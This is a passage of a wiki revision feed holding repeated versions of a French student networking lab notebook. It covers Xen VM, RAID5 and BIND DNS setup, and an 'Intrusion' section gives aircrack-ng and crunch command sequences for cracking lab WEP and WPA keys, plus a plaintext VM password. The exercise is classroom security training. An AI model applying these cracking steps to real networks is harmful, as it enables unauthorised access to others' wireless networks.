  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60252</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60252"/>
				<updated>2022-11-28T23:03:01Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60251</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60251"/>
				<updated>2022-11-28T23:02:22Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
&lt;br /&gt;
apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
